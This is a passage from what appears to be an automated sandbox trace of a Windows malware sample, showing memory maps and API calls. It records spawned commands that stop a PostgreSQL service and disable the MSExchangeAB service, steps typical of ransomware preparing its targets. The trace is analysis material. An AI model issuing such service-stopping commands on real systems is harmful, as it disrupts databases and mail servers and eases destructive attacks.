region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6668 start_va = 0x6e0000 end_va = 0x7dffff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 6669 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6670 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 6671 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6672 start_va = 0x340000 end_va = 0x3fdfff entry_point = 0x340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6673 start_va = 0x400000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6674 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6675 start_va = 0x9d0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 6676 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 6677 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 6678 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 6679 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 6680 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 6681 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 6682 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 6683 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 6684 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6685 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6686 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6687 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6688 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6689 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6690 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6691 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6692 start_va = 0x7ee50000 end_va = 0x7ef4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ee50000" filename = "" Region: id = 6693 start_va = 0x7ef76000 end_va = 0x7ef78fff entry_point = 0x0 region_type = private name = "private_0x000000007ef76000" filename = "" Region: id = 6694 start_va = 0x220000 end_va = 0x223fff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 6695 start_va = 0x4c0000 end_va = 0x4c2fff entry_point = 0x4c0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 6696 start_va = 0x510000 end_va = 0x541fff entry_point = 0x510000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 423 os_tid = 0xed0 [0129.091] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0129.091] __set_app_type (_Type=0x1) [0129.091] __p__fmode () returned 0x77ac4d6c [0129.091] __p__commode () returned 0x77ac5b1c [0129.091] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0129.091] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0129.091] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.091] GetConsoleOutputCP () returned 0x1b5 [0129.092] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0129.092] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.094] sprintf_s (in: _DstBuf=0x30fe04, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0129.094] setlocale (category=0, locale=".437") returned="English_United States.437" [0129.096] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.096] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0129.096] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop postgresql-9.0" [0129.096] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30fbac, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0129.096] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fba0 | out: Buffer=0x30fba0*=0x6e8090) returned 0x0 [0129.096] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fba4 | out: Buffer=0x30fba4*=0x6e7fb8) returned 0x0 [0129.096] __iob_func () returned 0x77ac1208 [0129.096] _fileno (_File=0x77ac1208) returned 0 [0129.096] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0129.096] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0129.096] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0129.096] _wcsicmp (_String1="config", _String2="stop") returned -16 [0129.096] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0129.096] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0129.096] _wcsicmp (_String1="file", _String2="stop") returned -13 [0129.096] _wcsicmp (_String1="files", _String2="stop") returned -13 [0129.096] _wcsicmp (_String1="group", _String2="stop") returned -12 [0129.096] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0129.096] _wcsicmp (_String1="help", _String2="stop") returned -11 [0129.096] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0129.096] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0129.096] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0129.096] _wcsicmp (_String1="session", _String2="stop") returned -15 [0129.096] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0129.096] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0129.096] _wcsicmp (_String1="share", _String2="stop") returned -12 [0129.096] _wcsicmp (_String1="start", _String2="stop") returned -14 [0129.096] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0129.096] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0129.096] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.096] _wcsicmp (_String1="accounts", _String2="postgresql-9.0") returned -15 [0129.096] _wcsicmp (_String1="computer", _String2="postgresql-9.0") returned -13 [0129.096] _wcsicmp (_String1="config", _String2="postgresql-9.0") returned -13 [0129.096] _wcsicmp (_String1="continue", _String2="postgresql-9.0") returned -13 [0129.096] _wcsicmp (_String1="cont", _String2="postgresql-9.0") returned -13 [0129.096] _wcsicmp (_String1="file", _String2="postgresql-9.0") returned -10 [0129.096] _wcsicmp (_String1="files", _String2="postgresql-9.0") returned -10 [0129.096] _wcsicmp (_String1="group", _String2="postgresql-9.0") returned -9 [0129.096] _wcsicmp (_String1="groups", _String2="postgresql-9.0") returned -9 [0129.096] _wcsicmp (_String1="help", _String2="postgresql-9.0") returned -8 [0129.096] _wcsicmp (_String1="helpmsg", _String2="postgresql-9.0") returned -8 [0129.096] _wcsicmp (_String1="localgroup", _String2="postgresql-9.0") returned -4 [0129.096] _wcsicmp (_String1="pause", _String2="postgresql-9.0") returned -14 [0129.096] _wcsicmp (_String1="session", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="sessions", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="sess", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="share", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="start", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="stats", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="statistics", _String2="postgresql-9.0") returned 3 [0129.096] _wcsicmp (_String1="stop", _String2="postgresql-9.0") returned 3 [0129.097] _wcsicmp (_String1="time", _String2="postgresql-9.0") returned 4 [0129.097] _wcsicmp (_String1="user", _String2="postgresql-9.0") returned 5 [0129.097] _wcsicmp (_String1="users", _String2="postgresql-9.0") returned 5 [0129.097] _wcsicmp (_String1="msg", _String2="postgresql-9.0") returned -3 [0129.097] _wcsicmp (_String1="messenger", _String2="postgresql-9.0") returned -3 [0129.097] _wcsicmp (_String1="receiver", _String2="postgresql-9.0") returned 2 [0129.097] _wcsicmp (_String1="rcv", _String2="postgresql-9.0") returned 2 [0129.097] _wcsicmp (_String1="netpopup", _String2="postgresql-9.0") returned -2 [0129.097] _wcsicmp (_String1="redirector", _String2="postgresql-9.0") returned 2 [0129.097] _wcsicmp (_String1="redir", _String2="postgresql-9.0") returned 2 [0129.097] _wcsicmp (_String1="rdr", _String2="postgresql-9.0") returned 2 [0129.097] _wcsicmp (_String1=0x1081ffc, _String2="postgresql-9.0") returned 7 [0129.097] _wcsicmp (_String1="work", _String2="postgresql-9.0") returned 7 [0129.097] _wcsicmp (_String1="wksta", _String2="postgresql-9.0") returned 7 [0129.097] _wcsicmp (_String1="prdr", _String2="postgresql-9.0") returned 3 [0129.097] _wcsicmp (_String1="devrdr", _String2="postgresql-9.0") returned -12 [0129.097] _wcsicmp (_String1="lanmanworkstation", _String2="postgresql-9.0") returned -4 [0129.097] _wcsicmp (_String1="server", _String2="postgresql-9.0") returned 3 [0129.097] _wcsicmp (_String1="svr", _String2="postgresql-9.0") returned 3 [0129.097] _wcsicmp (_String1="srv", _String2="postgresql-9.0") returned 3 [0129.097] _wcsicmp (_String1="lanmanserver", _String2="postgresql-9.0") returned -4 [0129.097] _wcsicmp (_String1="alerter", _String2="postgresql-9.0") returned -15 [0129.097] _wcsicmp (_String1="netlogon", _String2="postgresql-9.0") returned -2 [0129.097] _wcsupr (in: _String="postgresql-9.0" | out: _String="POSTGRESQL-9.0") returned="POSTGRESQL-9.0" [0129.097] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6e2638 [0129.099] GetServiceKeyNameW (in: hSCManager=0x6e2638, lpDisplayName="POSTGRESQL-9.0", lpServiceName=0x10a8cb0, lpcchBuffer=0x30fb1c | out: lpServiceName="", lpcchBuffer=0x30fb1c) returned 0 [0129.099] _wcsicmp (_String1="msg", _String2="POSTGRESQL-9.0") returned -3 [0129.099] _wcsicmp (_String1="messenger", _String2="POSTGRESQL-9.0") returned -3 [0129.099] _wcsicmp (_String1="receiver", _String2="POSTGRESQL-9.0") returned 2 [0129.100] _wcsicmp (_String1="rcv", _String2="POSTGRESQL-9.0") returned 2 [0129.100] _wcsicmp (_String1="redirector", _String2="POSTGRESQL-9.0") returned 2 [0129.100] _wcsicmp (_String1="redir", _String2="POSTGRESQL-9.0") returned 2 [0129.100] _wcsicmp (_String1="rdr", _String2="POSTGRESQL-9.0") returned 2 [0129.100] _wcsicmp (_String1="workstation", _String2="POSTGRESQL-9.0") returned 7 [0129.100] _wcsicmp (_String1="work", _String2="POSTGRESQL-9.0") returned 7 [0129.100] _wcsicmp (_String1="wksta", _String2="POSTGRESQL-9.0") returned 7 [0129.100] _wcsicmp (_String1="prdr", _String2="POSTGRESQL-9.0") returned 3 [0129.100] _wcsicmp (_String1="devrdr", _String2="POSTGRESQL-9.0") returned -12 [0129.100] _wcsicmp (_String1="lanmanworkstation", _String2="POSTGRESQL-9.0") returned -4 [0129.100] _wcsicmp (_String1="server", _String2="POSTGRESQL-9.0") returned 3 [0129.100] _wcsicmp (_String1="svr", _String2="POSTGRESQL-9.0") returned 3 [0129.100] _wcsicmp (_String1="srv", _String2="POSTGRESQL-9.0") returned 3 [0129.100] _wcsicmp (_String1="lanmanserver", _String2="POSTGRESQL-9.0") returned -4 [0129.100] _wcsicmp (_String1="alerter", _String2="POSTGRESQL-9.0") returned -15 [0129.100] _wcsicmp (_String1="netlogon", _String2="POSTGRESQL-9.0") returned -2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="WORKSTATION") returned -7 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="LanmanWorkstation") returned 4 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="SERVER") returned -3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="LanmanServer") returned 4 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="BROWSER") returned 14 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="BROWSER") returned 14 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="MESSENGER") returned 3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="MESSENGER") returned 3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETRUN") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETRUN") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="SPOOLER") returned -3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="SPOOLER") returned -3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="ALERTER") returned 15 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="ALERTER") returned 15 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETLOGON") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETLOGON") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETPOPUP") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="NETPOPUP") returned 2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="SQLSERVER") returned -3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="SQLSERVER") returned -3 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="REPLICATOR") returned -2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="REPLICATOR") returned -2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="REMOTEBOOT") returned -2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="REMOTEBOOT") returned -2 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="TIMESOURCE") returned -4 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="TIMESOURCE") returned -4 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="AFP") returned 15 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="AFP") returned 15 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="UPS") returned -5 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="UPS") returned -5 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="XACTSRV") returned -8 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="XACTSRV") returned -8 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="TCPIP") returned -4 [0129.100] _wcsicmp (_String1="POSTGRESQL-9.0", _String2="TCPIP") returned -4 [0129.100] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x6e3760 [0129.101] OpenServiceW (hSCManager=0x6e3760, lpServiceName="POSTGRESQL-9.0", dwDesiredAccess=0x84) returned 0x0 [0129.101] GetLastError () returned 0x424 [0129.101] CloseServiceHandle (hSCObject=0x6e3760) returned 1 [0129.101] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0129.101] LoadLibraryW (lpLibFileName="NETMSG") returned 0x4c0000 [0129.102] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x4c0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0129.103] GetFileType (hFile=0x40) returned 0x2 [0129.103] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x30f9b8 | out: lpMode=0x30f9b8) returned 1 [0129.103] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x30f9c4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x30f9c4*=0x1e) returned 1 [0129.103] GetFileType (hFile=0x40) returned 0x2 [0129.103] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x30f9b8 | out: lpMode=0x30f9b8) returned 1 [0129.104] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f9c4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x30f9c4*=0x2) returned 1 [0129.104] _ultow (in: _Dest=0x889, _Radix=3209688 | out: _Dest=0x889) returned="2185" [0129.104] FormatMessageW (in: dwFlags=0x2800, lpSource=0x4c0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0129.104] GetFileType (hFile=0x40) returned 0x2 [0129.104] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x30f9a8 | out: lpMode=0x30f9a8) returned 1 [0129.104] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x30f9b4, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x30f9b4*=0x34) returned 1 [0129.104] GetFileType (hFile=0x40) returned 0x2 [0129.104] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x30f9a8 | out: lpMode=0x30f9a8) returned 1 [0129.104] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x30f9b4, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x30f9b4*=0x2) returned 1 [0129.105] NetApiBufferFree (Buffer=0x6e8090) returned 0x0 [0129.105] NetApiBufferFree (Buffer=0x6e7fb8) returned 0x0 [0129.105] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop postgresql-9.0" [0129.105] exit (_Code=2) Thread: id = 424 os_tid = 0xeb0 Process: id = "116" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x26733000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeAB start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6697 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6698 start_va = 0x870000 end_va = 0x486ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 6699 start_va = 0x4870000 end_va = 0x488ffff entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 6700 start_va = 0x4890000 end_va = 0x4890fff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 6701 start_va = 0x48a0000 end_va = 0x48b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048a0000" filename = "" Region: id = 6702 start_va = 0x48c0000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x00000000048c0000" filename = "" Region: id = 6703 start_va = 0x4900000 end_va = 0x49fffff entry_point = 0x0 region_type = private name = "private_0x0000000004900000" filename = "" Region: id = 6704 start_va = 0x4a00000 end_va = 0x4a03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a00000" filename = "" Region: id = 6705 start_va = 0x4a10000 end_va = 0x4a10fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a10000" filename = "" Region: id = 6706 start_va = 0x4a20000 end_va = 0x4a21fff entry_point = 0x0 region_type = private name = "private_0x0000000004a20000" filename = "" Region: id = 6707 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6708 start_va = 0x7f530000 end_va = 0x7f552fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f530000" filename = "" Region: id = 6709 start_va = 0x7f556000 end_va = 0x7f556fff entry_point = 0x0 region_type = private name = "private_0x000000007f556000" filename = "" Region: id = 6710 start_va = 0x7f558000 end_va = 0x7f558fff entry_point = 0x0 region_type = private name = "private_0x000000007f558000" filename = "" Region: id = 6711 start_va = 0x7f55d000 end_va = 0x7f55ffff entry_point = 0x0 region_type = private name = "private_0x000000007f55d000" filename = "" Region: id = 6712 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6713 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6714 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6715 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6716 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6717 start_va = 0x4ba0000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 6718 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6719 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6720 start_va = 0x4d50000 end_va = 0x4e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d50000" filename = "" Region: id = 6721 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6762 start_va = 0x4870000 end_va = 0x487ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004870000" filename = "" Region: id = 6763 start_va = 0x4890000 end_va = 0x489ffff entry_point = 0x0 region_type = private name = "private_0x0000000004890000" filename = "" Region: id = 6764 start_va = 0x4a30000 end_va = 0x4aedfff entry_point = 0x4a30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6765 start_va = 0x4af0000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 6766 start_va = 0x4bb0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 6767 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6768 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6769 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6770 start_va = 0x7f430000 end_va = 0x7f52ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f430000" filename = "" Region: id = 6771 start_va = 0x7f55a000 end_va = 0x7f55cfff entry_point = 0x0 region_type = private name = "private_0x000000007f55a000" filename = "" Region: id = 6772 start_va = 0x4880000 end_va = 0x4883fff entry_point = 0x0 region_type = private name = "private_0x0000000004880000" filename = "" Region: id = 6773 start_va = 0x4b30000 end_va = 0x4b33fff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 6774 start_va = 0x4e50000 end_va = 0x5186fff entry_point = 0x4e50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 425 os_tid = 0xeb8 [0129.255] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0129.255] __set_app_type (_Type=0x1) [0129.255] __p__fmode () returned 0x77ac4d6c [0129.255] __p__commode () returned 0x77ac5b1c [0129.255] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0129.255] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, 